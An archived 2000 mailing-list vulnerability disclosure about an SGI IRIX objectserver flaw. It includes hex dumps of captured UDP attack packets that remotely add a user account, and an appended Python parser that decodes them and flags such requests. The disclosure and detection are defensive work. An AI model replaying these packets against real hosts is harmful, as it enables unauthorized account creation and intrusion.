Objectserver vulnerability
Date: Wed, 29 Mar 2000 08:52:06 EST
From: "Howard M. Kash III" <[email protected]>
To: [email protected]
Subject: Objectserver vulnerability
Since the patches are now officially released, I feel I can finally
release the details of the SGI objectserver vulnerability. This
vulnerability was initially reported to CERT and SGI Security on
October 6, 1997. A beta version of patch 2849 was provided in
February 1998.
Howard
----- Forwarded message # 1:
Date: Mon, 6 Oct 97 7:09:51 EDT
From: "Howard M. Kash III"
To: [email protected], [email protected]
Subject: URGENT - new SGI vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT
SGI objectserver vulnerability allows remote users to create accounts.
Yesterday two of our hosts were compromised by an (as far as I could
determine) unknown, unpatched bug in SGI's objectserver. The attack
consisted of sending UDP packets to port 5135 (see below). The
result was a non-root account being added to the system. The two
compromised hosts were running IRIX 6.2, but the vulnerability may
affect other versions of IRIX. The vulnerability does not appear to
give root access directly, as the attackers used other IRIX
vulnerabilities to gain root access after logging into the new
account.
Attached are the UDP packets exchanged between the attacking host
(aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP
addresses have been masked to protect the guilty - I mean innocent
until proven guilty. The result of this sequence of packets is the
following line added to /etc/passwd:
gueust:x:5002:20:LsD:/tmp/.new:/bin/csh
An entry must also be added to /etc/shadow since the attacker then
logs into the new account with a password.
As a temporary measure we have blocked all traffic to port 5135 at
our gateway.
Howard Kash
U.S. Army Research Lab
- ------------------------------------------------------------------------
TCP and UDP headers have been separated out. I've decoded some of the
packet contents into its ascii equivalent below the line.
16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
tttt tttt
112a 140f 003c 6516
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
4500 007b 0644 0000 3a11 26dc tttt tttt
aaaa aaaa
140f 112a 0067 0d37
0001 0186
0001 0000 0000 004f 0000 0000 2903 0043
000a 0080 4300 8043 0105 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
020a 0101 3b01 7804 690a 799a 0103 0a01
013b 0178 0469 0a79 9a01 04
16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
tttt tttt
112a 140f 0140 a1b2
0001 0000
0001 0000 0000 0128 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
g u e u s t
170b 0101 3b01 0201 0101 0943 0103 4c73
L s
4417 0b01 013b 016e 0106 0109 4300 170b
D
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
/ t m p / . n e w
016e 0112 0109 4301 0470 6f6f 7417 0b01
013b 016e 0102 0103 0017 0b01 013b 016e
0113 0109 4301 082f 6269 6e2f 6373 6817
/ b i n / c s h
0b01 013b 016e 010f 0109 4301 074c 7344
2f43 5444
16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
4500 0045 0646 0000 3a11 2710 tttt tttt
aaaa aaaa
140f 112a 0031 0ef5
0001 0187
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 39
16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
tttt tttt
112f 140f 003c 6511
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
4500 0088 0669 0000 3a11 26aa tttt tttt
aaaa aaaa
140f 112f 0074 3f4f
0001 0188
0001 0000 0000 005c 0000 0000 2903 0043
000a 0080 4300 8043 0106 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
390a 0101 3b01 7804 690a 799a 0102 0a01
013b 0178 0469 0a79 9a01 030a 0101 3b01
7804 690a 799a 0104
16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
tttt tttt
112f 140f 0142 1399
0001 0000
0001 0000 0000 012a 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
170b 0101 3b01 0201 0101 0943 0103 4c73
4417 0b01 013b 016e 0106 0109 4300 170b
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
016e 0112 0109 4301 0475 7365 7217 0b01
013b 016e 0102 0103 0213 8a17 0b01 013b
016e 0113 0109 4301 082f 6269 6e2f 6373
6817 0b01 013b 016e 010f 0109 4301 074c
7344 2f43 5444
16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
4500 0045 0671 0000 3a11 26e5 tttt tttt
aaaa aaaa
140f 112f 0031 0dee
0001 0189
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 3a
----- End of forwarded messages
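As an added example (not part of Howard's message or of any SGI code): a small Python parser for the tcpdump-style hex dump above. It peels off the IPv4 and UDP headers of the 312-byte request, pulls out the printable strings the author decoded by hand, and adds a defender-side check that flags an objectserver request carrying a login-shell path. It assumes the "aaaa"/"tttt" groups are masked address placeholders, as the post states.

```python
import re
import struct

# Constructed sample input: hex lines of the 312-byte request from the post's
# third capture (author's ASCII lines dropped; aaaa/tttt are masked addresses).
CAPTURE = """
4500 0154 7da3 0000 2a11 bea3 aaaa aaaa tttt tttt 112a 140f 0140 a1b2 0001 0000
0001 0000 0000 0128 0000 0000 1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374
170b 0101 3b01 0201 0101 0943 0103 4c73 4417 0b01 013b 016e 0106 0109 4300 170b
0101 3b01 6e01 0701 0943 0017 0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b 016e 0112 0109 4301 0470 6f6f 7417 0b01
013b 016e 0102 0103 0017 0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817
0b01 013b 016e 010f 0109 4301 074c 7344 2f43 5444
"""
OBJECTSERVER_PORT = 5135  # the UDP port the post's traffic was sent to

def dump_to_bytes(dump):
    """Convert a tcpdump-style hex dump to bytes; masked groups become zeros."""
    words = [w if re.fullmatch(r"[0-9a-f]{4}", w) else "0000" for w in dump.split()]
    return bytes.fromhex("".join(words))

def udp_payload(frame):
    """Peel off the IPv4 and UDP headers; return (src_port, dst_port, payload)."""
    if frame[0] >> 4 != 4 or frame[9] != 17:
        raise ValueError("not an IPv4/UDP datagram")
    ihl = (frame[0] & 0x0F) * 4
    sport, dport, ulen = struct.unpack("!HHH", frame[ihl:ihl + 6])
    return sport, dport, frame[ihl + 8:ihl + ulen]

def printable_strings(payload):
    """Runs of 4+ printable ASCII bytes, as the author decoded them by hand."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{4,}", payload)]

def is_account_creation_request(frame):
    """Defender's check: objectserver request that carries a login-shell path."""
    _, dport, payload = udp_payload(frame)
    shells = [s for s in printable_strings(payload) if s.startswith("/bin/")]
    return dport == OBJECTSERVER_PORT and bool(shells)
```

Run against the sample, `printable_strings` recovers the account name, home directory and shell that appear in the resulting /etc/passwd line.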